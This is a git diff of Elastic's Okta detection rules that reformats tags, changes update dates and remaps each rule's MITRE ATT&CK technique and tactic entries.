+[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.004" +name = "Credential Stuffing" +reference = "https://attack.mitre.org/techniques/T1110/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.threshold] field = ["okta.debug_context.debug_data.dt_hash"] value = 1 diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml index f68c3fed768..03486d8b6ad 100644 --- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml +++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/08" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -66,7 +66,13 @@ setup = """## Setup The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.""" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Domain: SaaS", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Credential Access", + "Domain: SaaS", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -101,31 +107,14 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index aaf6412175c..208243ef930 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/22" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/22" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ same dt_hash. This will help identify the nature of the anomaly. risk_score = 73 rule_id = "fb3ca230-af4e-11f0-900d-f661ea17fbcc" severity = "high" -tags = ["Domain: Identity", "Tactic: Defense Evasion", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "threshold" @@ -72,21 +79,17 @@ data_stream.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 48def95c88b..463bd891fd3 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/26" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -81,7 +81,15 @@ references = [ risk_score = 73 rule_id = "9ed5d08f-aad6-4c03-838c-d686da887c2c" severity = "high" -tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -151,30 +159,22 @@ FROM logs-okta.system-* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" @@ -184,3 +184,4 @@ reference = "https://attack.mitre.org/techniques/T1550/004/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml index 82d4bcc65fb..a27b743a262 100644 --- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml +++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -113,23 +113,29 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" [[rule.threat.technique.subtechnique]] id = "T1110.004" name = "Credential Stuffing" reference = "https://attack.mitre.org/techniques/T1110/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml index 2f24bf1da20..72b54d82017 100644 --- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml +++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -122,18 +122,14 @@ FROM logs-okta.system-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml index 9b00e895d4f..eef4992bb6a 100644 --- a/rules/integrations/okta/credential_access_user_impersonation_access.toml +++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/22" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -58,7 +58,12 @@ references = [ risk_score = 73 rule_id = "cdbebdc1-dc97-43c6-a538-f26a20c0a911" severity = "high" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -70,17 +75,8 @@ event.dataset:okta.system and event.action:user.session.impersonation.initiate [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml index 78efb62e5d5..5291da1293e 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -81,13 +81,19 @@ event.dataset:okta.system and event.action:zone.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml index 038fb4e5f17..7f1bcaf2c10 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -81,13 +81,19 @@ event.dataset:okta.system and event.action:zone.delete [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml index 4c597f990c3..c2ae0981e52 100644 --- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml +++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -62,7 +62,14 @@ references = [ risk_score = 47 rule_id = "6649e656-6f85-11ef-8876-f661ea17fbcc" severity = "medium" -tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: SaaS", + "Data Source: Okta", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -81,39 +88,22 @@ event.dataset: okta.system [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.display_name"] diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml index 8494737858f..afb56b6df29 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -88,13 +88,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml index f67bcff4ab9..497da81d4d9 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -87,13 +87,19 @@ event.dataset:okta.system and event.action:policy.rule.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml index 823db9f42f6..d15fdf5794f 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/28" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -88,23 +88,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml index 7bafae062cb..5b253b86daa 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -87,13 +87,19 @@ event.dataset:okta.system and event.action:policy.rule.delete [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml index ab57bdc871e..2be46aca15c 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -76,13 +76,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml index d06439bd616..b163bbcf480 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -85,13 +85,19 @@ event.dataset:okta.system and event.action:policy.rule.update [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml index a3dc9b07157..8c9739a98ea 100644 --- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml +++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -62,7 +62,12 @@ references = [ risk_score = 47 rule_id = "e90ee3af-45fc-432e-a850-4a58cf14a457" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -77,21 +82,41 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.threshold] field = ["okta.actor.alternate_id"] value = 5 diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 0500cf14163..121e67e54ef 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -62,7 +62,12 @@ references = [ risk_score = 21 rule_id = "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -73,18 +78,14 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index c5ef4a765ea..79b6707bfb6 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -69,7 +69,12 @@ references = [ risk_score = 21 rule_id = "c74fd275-ab2c-4d49-8890-e2943fa65c09" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -81,17 +86,8 @@ event.dataset:okta.system and event.action:application.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml index fe263825367..52c88d548de 100644 --- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml +++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -78,18 +78,19 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [[rule.threat.technique]] id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index 431094faa47..10d46662b9a 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -75,21 +75,17 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index 35aec3b7673..d157ea4686f 100644 --- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/14" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic", "Austin Songer"] @@ -76,18 +76,35 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + 